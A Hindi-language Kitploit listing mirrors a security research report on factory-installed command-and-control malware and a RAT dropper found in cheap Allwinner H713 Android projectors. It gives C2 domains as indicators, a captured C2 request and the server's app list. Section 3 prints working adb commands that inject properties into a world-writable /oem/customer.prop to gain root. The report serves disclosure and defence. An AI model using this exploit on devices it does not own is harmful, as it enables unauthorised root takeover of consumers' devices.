Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Android-Projector-C2-Malware — चीनी beamers के c2-network का ब्रेकडाउन - SilentSDK-Analysis | Kitploit
उपकरण/GitHubGitHub/kavan00/android-projector-c2-malware
एंड्रॉइड सुरक्षाएम्बेडेड सिस्टम सुरक्षासमझौता संकेतक (IOC) प्रबंधनIoT सुरक्षानेटवर्क फोरेंसिकरिवर्स इंजीनियरिंगमालवेयर विश्लेषणडिजिटल फोरेंसिककमांड एंड कंट्रोल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
खतरा खुफिया
आपूर्ति श्रृंखला सुरक्षा
फर्मवेयर विश्लेषण
GitHubkavan00/android-projector-c2-malware

Android-Projector-C2-Malware

चीनी beamers के c2-network का ब्रेकडाउन - SilentSDK-Analysis

रिपॉजिटरी देखें
182665 महीने पहलेअभी तक समीक्षित नहीं

एंड्रॉइड प्रोजेक्टर पर प्री-इंस्टॉल्ड C2 इंफ्रास्ट्रक्चर और RAT पेलोड

तकनीकी विश्लेषण रिपोर्ट — सुरक्षा अनुसंधान


प्रभावित उपकरण: Nonete जैसे बीमर ब्रांडों के कई एंड्रॉइड प्रोजेक्टर (उदा., मॉडल HY260Pro) (संभवतः Magcubic, Hotack, Huyukang और कई अन्य के भी कई प्रोजेक्टर, क्योंकि ये कंपनियां समान मॉडल वितरित करती हैं और इसका समर्थन करने वाले संकेत हैं)
चिपसेट प्लेटफॉर्म: Allwinner H713 / sun50iw12p1 — संभावित रूप से इस प्लेटफॉर्म के सभी उपकरणों को प्रभावित करता है
विश्लेषण अवधि: 11–17 अप्रैल, 2026
वर्गीकरण: रिमोट एक्सेस ट्रोजन पेलोड के साथ प्री-इंस्टॉल्ड कमांड-एंड-कंट्रोल इंफ्रास्ट्रक्चर


TL;DR

  • समस्या: कई सस्ते एंड्रॉइड प्रोजेक्टर (संभावित रूप से Magcubic, Hotack आदि जैसे ब्रांड, जो Allwinner H713 चिप का उपयोग करते हैं), वर्तमान में Amazon, eBay और AliExpress पर भारी मात्रा में बेचे जा रहे हैं, फैक्ट्री से ही मैलवेयर से संक्रमित हैं (सप्लाई चेन अटैक, "BADBOX" मामलों के समान)।
  • तंत्र: एक प्रतीत होता हानिरहित सिस्टम ऐप ("StoreOS") एक छिपे हुए ड्रॉपर के रूप में कार्य करता है। यह पूरी तरह से चुपचाप पृष्ठभूमि में "SilentSDK" नामक एक स्टेज-2-ड्रॉपर डाउनलोड करता है और इसे अधिकतम सिस्टम विशेषाधिकारों के साथ स्थापित करता है, जो बदले में एक मॉड्यूलर, प्लगइन-आधारित, आर्किटेक्चर-जागरूक RAT और संभवतः फिशिंग फ्रेमवर्क स्थापित करता है।
  • खतरा: मैलवेयर चीन में एक C2 कनेक्शन स्थापित करता है (api.pixelpioneerss.com), संवेदनशील डिवाइस आईडी निकालता है, और किसी भी समय रूट विशेषाधिकारों के साथ मनमाना अतिरिक्त दुर्भावनापूर्ण कोड डाउनलोड और निष्पादित कर सकता है (chmod 777)। इसके अतिरिक्त, उपकरणों में खुले रूट बैकडोर हैं।
  • तत्काल शमन: C2 डोमेन (विशेष रूप से *.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) को नेटवर्क स्तर पर अवरुद्ध किया जाना चाहिए। प्रभावित उपयोगकर्ता केवल ADB के माध्यम से मैन्युअल रूप से दुर्भावनापूर्ण ऐप्स को अक्षम कर सकते हैं, क्योंकि वे सिस्टम में गहराई से एम्बेडेड हैं।

तात्कालिकता सूचना

इस रिपोर्ट में प्रलेखित मैलवेयर इंफ्रास्ट्रक्चर एंड्रॉइड प्रोजेक्टरों पर प्री-इंस्टॉल्ड है जो वर्तमान में Amazon, eBay और AliExpress पर अंतिम उपभोक्ताओं को बड़ी मात्रा में बेचे जा रहे हैं। प्रभावित उपकरणों में संभवतः कई ब्रांड नाम शामिल हैं (Hotack, Huyukang, Magcubic, Nonete, और अन्य)। एक ही निर्माता के अन्य उपकरणों पर समान C2 इंफ्रास्ट्रक्चर की स्वतंत्र रूप से पुष्टि की गई है (धारा 13 देखें)। पैटर्न BADBOX मामलों से मेल खाता है।


विषय सूची

  1. डिवाइस पहचान
  2. जांच कार्यप्रवाह
  3. रूट एक्सेस — एक्सप्लॉइट पथ
  4. C2 सर्वर प्रतिक्रिया — मुख्य साक्ष्य
  5. मैलवेयर इकोसिस्टम अवलोकन
  6. StoreOS — ड्रॉपर विश्लेषण (com.htc.storeos)
  7. EventUploadService — टेलीमेट्री (com.htc.eventuploadservice)
  8. ExpandSDK — विज्ञापन-इंजेक्शन (com.htc.expandsdk)
  9. SilentSDK — स्टेज-2-ड्रॉपर विश्लेषण (com.hotack.silentsdk)
  10. मैलवेयर
  11. सिस्टम बैकडोर
  12. नेटवर्क फोरेंसिक
  13. डिवाइस स्पूफिंग (बिल्ड-फिंगरप्रिंट स्पूफिंग)
  14. बाहरी पुष्टि
  15. समझौता संकेतक (IOCs)
  16. MITRE ATT&CK मैपिंग
  17. तत्काल शमन
  18. स्रोत

खरीदा गया उपकरण: Amazon लिंक - Nonete Mini Beamer 4K 1080P


1. डिवाइस पहचान

गुणमान
ब्रांड नामNonete HY260Pro (कई कंपनियों द्वारा बेचा गया मॉडल)
आंतरिक मॉडल नामNT10
SoCAllwinner sun50iw12p1 (ARM 32-बिट)
ऑपरेटिंग सिस्टमSpectraOS (Android 11, कर्नेल 5.4.99)
वास्तविक बिल्ड फिंगरप्रिंटAllwinner/h713_tuna_p3/h713-tuna_p3:11
स्पूफ़्ड बिल्ड फिंगरप्रिंटADT-3/adt3/adt3:11/RP1A.201005.006
SELinuxअनुमेय (कोई प्रवर्तन नहीं)
प्लेटफॉर्म हस्ताक्षर कुंजीसार्वजनिक AOSP परीक्षण कुंजी
OEM प्रमाणपत्रCN=蓝鲨, OU=www.bsh.me, C=CN
फर्मवेयर चैनलHY260Pro_SpectraOS_TPYB

दायरे पर नोट: Allwinner H713 चिपसेट यूरोपीय बाजार में बदलते ब्रांड नामों के तहत बेचे जाने वाले कई सस्ते एंड्रॉइड प्रोजेक्टरों में बनाया गया है। समान फर्मवेयर बेस (h713_tuna_p3) और समान C2 ऑपरेटर (शेन्ज़ेन आओडिन टेक्नोलॉजी) दृढ़ता से सुझाव देते हैं कि इस OEM के सभी उपकरणों में समान इंफ्रास्ट्रक्चर है।


2. जांच कार्यप्रवाह

कदमकार्रवाईपरिणाम
1नेटवर्क ट्रैफिक का Wireshark कैप्चरstore-api.aodintech.com को HTTP ट्रैफिक
2gzip-संपीड़ित C2 प्रतिक्रिया का डिकोडिंग7 ऐप्स, जिनमें छिपा हुआ "SilentTools" शामिल है
3डाउनलोड पथ का AES-CBC डिक्रिप्शनकुंजी [REDACTED], .bpp फ़ाइल का URL
4/oem/customer.prop के माध्यम से रूट एक्सप्लॉइटप्रॉपर्टी इंजेक्शन के बाद uid=0(root)
5/data, /oem, /system का फोरेंसिक डंपAPKs, डेटाबेस, कॉन्फ़िगरेशन
6StoreOS DEX का स्थैतिक विश्लेषणpm install -r -d, बाइट-रिवर्सल सुरक्षा
7reverseLen तंत्र का रिवर्स इंजीनियरिंगएंटी-विश्लेषण सुरक्षा की समझ
8बाइट-रिवर्सल सुरक्षा को तोड़नाडिक्रिप्टेड, विश्लेषण योग्य SilentSDK DEX
9SilentSDK स्ट्रिंग्स का XOR डिक्रिप्शनC2 डोमेन api.pixelpioneerss.com की पुष्टि
10तीन स्रोतों में हैश सत्यापनMD5/SHA-256 पूरी तरह मेल खाते हैं
11मैलवेयर डाउनलोड प्रक्रिया का रिवर्स इंजीनियरिंगसर्वर अभी भी ऑनलाइन हैं
12मैलवेयर का रिवर्स इंजीनियरिंगप्लगइन-आधारित RAT फ्रेमवर्क

3. रूट एक्सेस — एक्सप्लॉइट पथ

रूट एक्सेस तीन कमजोरियों के संयोजन के माध्यम से प्राप्त किया गया था:

  1. SELinux अनुमेय — एक्सेस उल्लंघन केवल लॉग किए जाते हैं, अवरुद्ध नहीं।
  2. विश्व-लेखनीय /oem — पार्टीशन FAT के रूप में fmask=0000 के साथ माउंट किया गया है।
  3. बूट पर customer.prop लोड होता है — सिस्टम प्रॉपर्टीज़ को अधिलेखित करता है।```bash adb shell getenforce # Result: Permissive adb shell ls -la /oem/ # All files world-writable

adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'

adb reboot && adb wait-for-device && adb root adb shell id

uid=0(root) gid=0(root) context=u:r:su:s0

**प्रभाव:** कोई भी उपयोगकर्ता जिसके पास भौतिक पहुंच है या उसी नेटवर्क पर कोई हमलावर (ADB के माध्यम से, पोर्ट 5555 खुला, कोई प्रमाणीकरण नहीं) पूर्ण रूट एक्सेस प्राप्त करता है।

---

## 4. C2 सर्वर प्रतिक्रिया — मुख्य साक्ष्य

### कैप्चर किया गया HTTP अनुरोध```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12

सर्वर प्रतिक्रिया (pcapng से डिकोड की गई - तालिका)

gzip-संपीड़ित प्रतिक्रिया में सात ऐप्स के साथ एक JSON सूची है। उनमें से छह नियमित स्ट्रीमिंग ऐप्स हैं (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere)। सातवाँ SilentTools है:

AppPackageisShowisForceisSilent InstallisSilent Uninstalllaunch Type
YouTubecom.google.android.youtube.tvtruefalsefalsefalse0
Disney+com.disney.disneyplustruefalsefalsefalse0
Netflixcom.netflix.mediaclienttruefalsefalsefalse0
Chromecom.android.chrometruefalsefalsefalse0
Prime Videocom.amazon.amazonvideo.livingroomtruefalsefalsefalse0
BrowseHerecom.tcl.browsertruefalsefalsefalse0
SilentToolscom.hotack.silentsdkfalsetruefalsetrue1
टूल डाउनलोड करें